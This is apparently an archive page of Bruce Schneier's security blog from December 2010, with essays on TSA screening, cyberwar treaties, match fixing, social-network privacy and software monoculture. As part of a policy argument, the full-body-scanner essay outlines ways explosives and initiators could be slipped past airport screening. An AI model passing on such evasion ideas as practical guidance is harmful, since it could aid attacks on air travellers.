I give thanks for Benjamin Franklin’s words after the 1787 Constitutional Convention describing the results of its deliberations: “A Republic, if you can keep it.”

To keep it, push back against enhanced patting, Chertoff’s naked-screening and the sinister drumbeat of fear.

Christopher Hitchens, Don’t Be an Ass About Airport Security.”

Tom Engelhardt, “The National Security State Cops a Feel.”

Evan DeFilippis, “A Nude Awakening—TSA and Privacy“:

If we have both the right to privacy and the right to travel, then TSA´s newest procedures cannot conceivably be considered legal. The TSA´s regulations blatantly compromise the former at the expense of the latter, and as time goes on we will soon forget what it meant to have those rights.

EDITED TO ADD (12/8): Also, this great comic.

Posted on December 8, 2010 at 7:10 AM37 Comments

Profiling Lone Terrorists

Masters Thesis from the Naval Postgraduate School: “Patterns of Radicalization: Identifying the Markers and Warning Signs of Domestic Lone Wolf Terrorists in Our Midst.”

Abstract:

This thesis will scrutinize the histories of our nation’s three most prolific domestic lone wolf terrorists: Tim McVeigh, Ted Kaczynski, and Eric Rudolph. It will establish a chronological pattern to their radicalization and reveal that their communal ideological beliefs, psychology, attributes, traits, and training take place along a common chronological timeline. Their pattern of radicalization can be used as an indicator of lone wolf terrorist radicalization development in future cases. This thesis establishes a strikingly similar chronological pattern of radicalization that was present in each terrorist’s biography. This pattern can identify future lone wolf terrorist radicalization activity upstream. It can provide a valuable portent to apply in the analysis of potential lone terrorists, potentially enabling law enforcement to prevent tragedies emerging from the identified population through psychological assistance, evaluation, training, or, in the worst case, detention.

Paper.

Posted on December 7, 2010 at 6:43 AM72 Comments

FTC Privacy Report

The U.S. Federal Trade Commission released its privacy report: “Protecting Consumer Privacy in an Era of Rapid Change.”

From the press release:

One method of simplified choice the FTC staff recommends is a “Do Not Track” mechanism governing the collection of information about consumer’s Internet activity to deliver targeted advertisements and for other purposes. Consumers and industry both support increased transparency and choice for this largely invisible practice. The Commission recommends a simple, easy to use choice mechanism for consumers to opt out of the collection of information about their Internet behavior for targeted ads. The most practical method would probably involve the placement of a persistent setting, similar to a cookie, on the consumer’s browser signaling the consumer’s choices about being tracked and receiving targeted ads.

News story.

Posted on December 6, 2010 at 1:52 PM30 Comments

Cyberwar and the Future of Cyber Conflict

The world is gearing up for cyberwar. The U.S. Cyber Command became operational in November. NATO has enshrined cyber security among its new strategic priorities. The head of Britain’s armed forces said recently that boosting cyber capability is now a huge priority for the UK. And we know China is already engaged in broad cyber espionage attacks against the west. So how can we control a burgeoning cyber arms race?

We may already have seen early versions of cyberwars in Estonia and Georgia, possibly perpetrated by Russia. It’s hard to know for certain, not only because such attacks are often impossible to trace, but because we have no clear definitions of what a cyberwar actually is.

Do the 2007 attacks against Estonia, traced to a young Russian man living in Tallinn and no one else, count? What about a virus from an unknown origin, possibly targeted at an Iranian nuclear complex? Or espionage from within China, but not specifically directed by its government? To such questions one must add even more basic issues, like when a cyberwar is understood to have begun, and how it ends. When even cyber security experts can’t answer these questions, it’s hard to expect much from policymakers.

We can set parameters. It is obviously not an act of war just to develop digital weapons targeting another country. Using cyber attacks to spy on another nation is a grey area, which gets greyer still when a country penetrates information networks, just to see if it can do so. Penetrating such networks and leaving a back door open, or even leaving logic bombs behind to be used later, is a harder case—yet the US and China are doing this to each other right now.

And what about when one country deliberately damages the economy of another, as one of the WikiLeaks cables shows that a member of China’s politburo did against Google in January 2010? Definitions and rules are hard not just because the tools of war have changed, but because cyberspace puts them into the hands of a broader group of people. Previously only the military had weapons. Now anyone with sufficient computer skills can take matters into their own hands.

There are more basic problems too. When a nation is attacked in a regular conflict, a variety of military and civil institutions respond. The legal framework for this depends on two things: the attacker and the motive. But when you’re attacked on the internet, those are precisely the two things you don’t know. We don’t know if Georgia was attacked by the Russian government, or just some hackers living in Russia. In spite of much speculation, we don’t know the origin, or target, of Stuxnet. We don’t even know if last July 4’s attacks against US and South Korean computers originated in North Korea, China, England, or Florida.

When you don’t know, it’s easy to get it wrong; and to retaliate against the wrong target, or for the wrong reason. That means it is easy for things to get out of hand. So while it is legitimate for nations to build offensive and defensive cyberwar capabilities we also need to think now about what can be done to limit the risk of cyberwar.

A first step would be a hotline between the world’s cyber commands, modelled after similar hotlines among nuclear commands. This would at least allow governments to talk to each other, rather than guess where an attack came from. More difficult, but more important, are new cyberwar treaties. These could stipulate a no first use policy, outlaw unaimed weapons, or mandate weapons that self-destruct at the end of hostilities. The Geneva Conventions need to be updated too.

Cyber weapons beg to be used, so limits on stockpiles, and restrictions on tactics, are a logical end point. International banking, for instance, could be declared off-limits. Whatever the specifics, such agreements are badly needed. Enforcement will be difficult, but that’s not a reason not to try. It’s not too late to reverse the cyber arms race currently under way. Otherwise, it is only a matter of time before something big happens: perhaps by the rash actions of a low level military officer, perhaps by a non-state actor, perhaps by accident. And if the target nation retaliates, we could actually find ourselves in a cyberwar.

This essay was originally published in the Financial Times (free registration required for access, or search on Google News).

Posted on December 6, 2010 at 6:42 AM70 Comments

Football Match Fixing

Detecting fixed football (soccer) games.

There is a certain buzz of expectation, because Oscar, one of the fraud analysts, has spotted a game he is sure has been fixed.

“We’ve been watching this for a couple of weeks now,” he says.

“The odds have gone to a very suspicious level. We believe that this game will finish in an away victory. Usually an away team would have around a 30% chance of winning, but at the current odds this team is about 85% likely to win.”

[…]

Often news of the fix will leak so that gamblers jump on the bandwagon. The game we are watching falls, it seems, into the second category.

Oscar monitors the betting at half-time. He is especially interested in money being laid not on the result itself, but on the number of goals that are going to be scored.

“The most likely score lines are 2-1 or 3-1,” he announces.

This is interesting:

Oscar is also interested in the activity of a club manager – but his modus operandi is somewhat different. He does not throw games. He wins them.

[…]

“The reason he’s so important is because he has relationships with all his previous clubs. He has managed at least three or four of the teams he is now buying wins against. He has also managed a lot of players from the opposition, who are being told to lose these matches.”

I always think of fixing a game as meaning losing it on purpose, not winning it by paying the other team to lose.

Posted on December 3, 2010 at 12:41 PM13 Comments

Full Body Scanners: What's Next?

Organizers of National Opt Out Day, the Wednesday before Thanksgiving when air travelers were urged to opt out of the full-body scanners at security checkpoints and instead submit to full-body patdowns—were outfoxed by the TSA. The government pre-empted the protest by turning off the machines in most airports during the Thanksgiving weekend. Everyone went through the metal detectors, just as before.

Now that Thanksgiving is over, the machines are back on and the "enhanced" pat-downs have resumed. I suspect that more people would prefer to have naked images of themselves seen by TSA agents in another room, than have themselves intimately touched by a TSA agent right in front of them.

But now, the TSA is in a bind. Regardless of whatever lobbying came before, or whatever former DHS officials had a financial interest in these scanners, the TSA has spent billions on those scanners, claiming they’re essential. But because people can opt out, the alternate manual method must be equally effective; otherwise, the terrorists could just opt out. If they make the pat-downs less invasive, it would be the same as admitting the scanners aren’t essential. Senior officials would get fired over that.

So not counting inconsequential modifications to demonstrate they’re "listening," the pat-downs will continue. And they’ll continue for everyone: children, abuse survivors, rape survivors, urostomy bag wearers, people in wheelchairs. It has to be that way; otherwise, the terrorists could simply adapt. They’d hide their explosives on their children or in their urostomy bags. They’d recruit rape survivors, abuse survivors, or seniors. They’d dress as pilots. They’d sneak their PETN through airport security using the very type of person who isn’t being screened.

And PETN is what the TSA is looking for these days. That’s pentaerythritol tetranitrate, the plastic explosive that both the Shoe Bomber and the Underwear Bomber attempted but failed to detonate. It’s what was mailed from Yemen. It’s in Iraq and Afghanistan. Guns and traditional bombs are passé; PETN is the terrorist tool of the future.

The problem is that no scanners or puffers can detect PETN; only swabs and dogs work. What the TSA hopes is that they will detect the bulge if someone is hiding a wad of it on their person. But they won’t catch PETN hidden in a body cavity. That doesn’t have to be as gross as you’re imagining; you can hide PETN in your mouth. A terrorist can go through the scanners a dozen times with bits in his mouth each time, and assemble a bigger bomb on the other side. Or he can roll it thin enough to be part of a garment, and sneak it through that way. These tricks aren’t new. In the days after the Underwear Bomber was stopped, a scanner manufacturer admitted that the machines might not have caught him.

So what’s next? Strip searches? Body cavity searches? TSA Administrator John Pistole said there would be no body cavity searches for now, but his reasons make no sense. He said that the case widely reported as being a body cavity bomb might not actually have been. While that appears to be true, what does that have to do with future bombs? He also said that even body cavity bombs would need "external initiators" that the TSA would be able to detect.

Do you think for a minute that the TSA can detect these "external initiators"? Do you think that if a terrorist took a laptop—or better yet, a less-common piece of electronics gear—and removed the insides and replaced them with a timer, a pressure sensor, a simple contact switch, or a radio frequency switch, the TSA guy behind the X-ray machine monitor would detect it? How about if those components were distributed over a few trips through airport security. On the other hand, if we believe the TSA can magically detect these "external initiators" so effectively that they make body-cavity searches unnecessary, why do we need the full-body scanners?

Either PETN is a danger that must be searched for, or it isn’t. Pistole was being either ignorant or evasive.

Once again, the TSA is covering their own asses by implementing security-theater measures to prevent the previous attack while ignoring any threats of future attacks. It’s the same thinking that caused them to ban box cutters after 9/11, screen shoes after Richard Reid, limit liquids after that London gang, and—I kid you not—ban printer cartridges over 16 ounces after they were used to house package bombs from Yemen. They act like the terrorists are incapable of thinking creatively, while the terrorists repeatedly demonstrate that can always come up with a new approach that circumvents the old measures.

On the plus side, PETN is very hard to get to explode. The pre-9/11 screening procedures, looking for obvious guns and bombs, forced the terrorists to build inefficient fusing mechanisms. We saw this when Abdulmutallab, the Underwear Bomber, used bottles of liquid and a syringe and 20 minutes in the bathroom to assemble his device, then set his pants on fire—and still failed to ignite his PETN-filled underwear. And when he failed, the passengers quickly subdued him.

The truth is that exactly two things have made air travel safer since 9/11: reinforcing cockpit doors and convincing passengers they need to fight back. The TSA should continue to screen checked luggage. They should start screening airport workers. And then they should return airport security to pre-9/11 levels and let the rest of their budget be used for better purposes. Investigation and intelligence is how we’re going to prevent terrorism, on airplanes and elsewhere. It’s how we caught the liquid bombers. It’s how we found the Yemeni printer-cartridge bombs. And it’s our best chance at stopping the next serious plot.

Because if a group of well-planned and well-funded terrorist plotters makes it to the airport, the chance is pretty low that those blue-shirted crotch-groping water-bottle-confiscating TSA agents are going to catch them. The agents are trying to do a good job, but the deck is so stacked against them that their job is impossible. Airport security is the last line of defense, and it’s not a very good one.

We have a job here, too, and it’s to be indomitable in the face of terrorism. The goal of terrorism is to terrorize us: to make us afraid, and make our government do exactly what the TSA is doing. When we react out of fear, the terrorists succeed even when their plots fail. But if we carry on as before, the terrorists fail—even when their plots succeed.

This essay originally appeared on The Atlantic website.

Posted on December 3, 2010 at 6:20 AM131 Comments

Close the Washington Monument

Securing the Washington Monument from terrorism has turned out to be a surprisingly difficult job. The concrete fence around the building protects it from attacking vehicles, but there’s no visually appealing way to house the airport-level security mechanisms the National Park Service has decided are a must for visitors. It is considering several options, but I think we should close the monument entirely. Let it stand, empty and inaccessible, as a monument to our fears.

An empty Washington Monument would serve as a constant reminder to those on Capitol Hill that they are afraid of the terrorists and what they could do. They’re afraid that by speaking honestly about the impossibility of attaining absolute security or the inevitability of terrorism—or that some American ideals are worth maintaining even in the face of adversity—they will be branded as “soft on terror.” And they’re afraid that Americans would vote them out of office if another attack occurred. Perhaps they’re right, but what has happened to leaders who aren’t afraid? What has happened to “the only thing we have to fear is fear itself”?

An empty Washington Monument would symbolize our lawmakers’ inability to take that kind of stand—and their inability to truly lead.

Some of them call terrorism an “existential threat” against our nation. It’s not. Even the events of 9/11, as horrific as they were, didn’t make an existential dent in our nation. Automobile-related fatalities—at 42,000 per year, more deaths each month, on average, than 9/11—aren’t, either. It’s our reaction to terrorism that threatens our nation, not terrorism itself. The empty monument would symbolize the empty rhetoric of those leaders who preach fear and then use that fear for their own political ends.

The day after Umar Farouk Abdulmutallab failed to blow up a Northwest jet with a bomb hidden in his underwear, Homeland Security Secretary Janet Napolitano said “The system worked.” I agreed. Plane lands safely, terrorist in custody, nobody injured except the terrorist. Seems like a working system to me. The empty monument would represent the politicians and press who pilloried her for her comment, and Napolitano herself, for backing down.

The empty monument would symbolize our war on the unexpected,—our overreaction to anything different or unusual—our harassment of photographers, and our probing of airline passengers. It would symbolize our “show me your papers” society, rife with ID checks and security cameras. As long as we’re willing to sacrifice essential liberties for a little temporary safety, we should keep the Washington Monument empty.

Terrorism isn’t a crime against people or property. It’s a crime against our minds, using the death of innocents and destruction of property to make us fearful. Terrorists use the media to magnify their actions and further spread fear. And when we react out of fear, when we change our policy to make our country less open, the terrorists succeed—even if their attacks fail. But when we refuse to be terrorized, when we’re indomitable in the face of terror, the terrorists fail—even if their attacks succeed.

We can reopen the monument when every foiled or failed terrorist plot causes us to praise our security, instead of redoubling it. When the occasional terrorist attack succeeds, as it inevitably will, we accept it, as we accept the murder rate and automobile-related death rate; and redouble our efforts to remain a free and open society.

The grand reopening of the Washington Monument will not occur when we’ve won the war on terror, because that will never happen. It won’t even occur when we’ve defeated al Qaeda. Militant Islamic terrorism has fractured into small, elusive groups. We can reopen the Washington Monument when we’ve defeated our fears, when we’ve come to accept that placing safety above all other virtues cedes too much power to government and that liberty is worth the risks, and that the price of freedom is accepting the possibility of crime.

I would proudly climb to the top of a monument to those ideals.

A version of this essay—there were a lot of changes and edits—originally appeared in the New York Daily News.

I wish I’d come up with the idea of closing the Washington Monument, but I didn’t. It was the Washington Post’s Philip Kennicott’s idea, although he didn’t say it with as much fervor.

Posted on December 2, 2010 at 10:41 AM129 Comments

Brian Snow Sows Cyber Fears

That’s no less sensational than the Calgary Herald headline: “Total cyber-meltdown almost inevitable, expert tells Calgary audience.” That’s former NSA Technical Director Brian Snow talking to a university audience.

“It’s long weeks to short months at best before there’s a security meltdown,” said Snow, as a guest lecturer for the Institute for Security, Privacy and Information Assurance, an interdisciplinary group at the university dedicated to information security.

“Will a bank failure be the wake-up call before we act? It’s a global problem—not just the U.S., not just Canada, but the world.”

I know Brian, and I have to believe his definition of “security meltdown” is more limited than the headline leads one to believe.

Posted on December 2, 2010 at 7:06 AM31 Comments

Risk Reduction Strategies on Social Networking Sites

By two teenagers:

Mikalah uses Facebook but when she goes to log out, she deactivates her Facebook account. She knows that this doesn’t delete the account ­ that’s the point. She knows that when she logs back in, she’ll be able to reactivate the account and have all of her friend connections back. But when she’s not logged in, no one can post messages on her wall or send her messages privately or browse her content. But when she’s logged in, they can do all of that. And she can delete anything that she doesn’t like. Michael Ducker calls this practice “super-logoff” when he noticed a group of gay male adults doing the exact same thing.

And:

Shamika doesn’t deactivate her Facebook profile but she does delete every wall message, status update, and Like shortly after it’s posted. She’ll post a status update and leave it there until she’s ready to post the next one or until she’s done with it. Then she’ll delete it from her profile. When she’s done reading a friend’s comment on her page, she’ll delete it. She’ll leave a Like up for a few days for her friends to see and then delete it.

I’ve heard this practice called wall scrubbing.

In any reasonably competitive market economy, sites would offer these as options to better serve their customers. But in the give-it-away user-as-product economy we so often have on the Internet, the social networking sites have a different agenda.

Posted on December 1, 2010 at 1:27 PM51 Comments

Software Monoculture

In 2003, a group of security experts—myself included—published a paper saying that 1) software monocultures are dangerous and 2) Microsoft, being the largest creator of monocultures out there, is the most dangerous. Marcus Ranum responded with an essay that basically said we were full of it. Now, eight years later, Marcus and I thought it would be interesting to revisit the debate.

The basic problem with a monoculture is that it’s all vulnerable to the same attack. The Irish Potato Famine of 1845–9 is perhaps the most famous monoculture-related disaster. The Irish planted only one variety of potato, and the genetically identical potatoes succumbed to a rot caused by Phytophthora infestans. Compare that with the diversity of potatoes traditionally grown in South America, each one adapted to the particular soil and climate of its home, and you can see the security value in heterogeneity.

Similar risks exist in networked computer systems. If everyone is using the same operating system or the same applications software or the same networking protocol, and a security vulnerability is discovered in that OS or software or protocol, a single exploit can affect everyone. This is the problem of large-scale Internet worms: many have affected millions of computers on the Internet.

If our networking environment weren’t homogeneous, a single worm couldn’t do so much damage. We’d be more like South America’s potato crop than Ireland’s. Conclusion: monoculture is bad; embrace diversity or die along with everyone else.

This analysis makes sense as far as it goes, but suffers from three basic flaws. The first is the assumption that our IT monoculture is as simple as the potato’s. When the particularly virulent Storm worm hit, it only affected from 1–10 million of its billion-plus possible victims. Why? Because some computers were running updated antivirus software, or were within locked-down networks, or whatever. Two computers might be running the same OS or applications software, but they’ll be inside different networks with different firewalls and IDSs and router policies, they’ll have different antivirus programs and different patch levels and different configurations, and they’ll be in different parts of the Internet connected to different servers running different services. As Marcus pointed out back in 2003, they’ll be a little bit different themselves. That’s one of the reasons large-scale Internet worms don’t infect everyone—as well as the network’s ability to quickly develop and deploy patches, new antivirus signatures, new IPS signatures, and so on.

The second flaw in the monoculture analysis is that it downplays the cost of diversity. Sure, it would be great if a corporate IT department ran half Windows and half Linux, or half Apache and half Microsoft IIS, but doing so would require more expertise and cost more money. It wouldn’t cost twice the expertise and money—there is some overlap—but there are significant economies of scale that result from everyone using the same software and configuration. A single operating system locked down by experts is far more secure than two operating systems configured by sysadmins who aren’t so expert. Sometimes, as Mark Twain said: “Put all your eggs in one basket, and then guard that basket!”

The third flaw is that you can only get a limited amount of diversity by using two operating systems, or routers from three vendors. South American potato diversity comes from hundreds of different varieties. Genetic diversity comes from millions of different genomes. In monoculture terms, two is little better than one. Even worse, since a network’s security is primarily the minimum of the security of its components, a diverse network is less secure because it is vulnerable to attacks against any of its heterogeneous components.

Some monoculture is necessary in computer networks. As long as we have to talk to each other, we’re all going to have to use TCP/IP, HTML, PDF, and all sorts of other standards and protocols that guarantee interoperability. Yes, there will be different implementations of the same protocol—and this is a good thing—but that won’t protect you completely. You can’t be too different from everyone else on the Internet, because if you were, you couldn’t be on the Internet.

Species basically have two options for propagating their genes: the lobster strategy and the avian strategy. Lobsters lay 5,000 to 40,000 eggs at a time, and essentially ignore them. Only a minuscule percentage of the hatchlings live to be four weeks old, but that’s sufficient to ensure gene propagation; from every 50,000 eggs, an average of two lobsters is expected to survive to legal size. Conversely, birds produce only a few eggs at a time, then spend a lot of effort ensuring that most of the hatchlings survive. In ecology, this is known as r/K selection theory. In either case, each of those offspring varies slightly genetically, so if a new threat arises, some of them will be more likely to survive. But even so, extinctions happen regularly on our planet; neither strategy is foolproof.

Our IT infrastructure is a lot more like a bird than a lobster. Yes, monoculture is dangerous and diversity is important. But investing time and effort in ensuring our current infrastructure’s survival is even more important.

This essay was originally published in Information Security, and is the first half of a point/counterpoint with Marcus Ranum. You can read his response there as well.

EDITED TO ADD (12/13): Commentary.

Posted on December 1, 2010 at 5:55 AM57 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.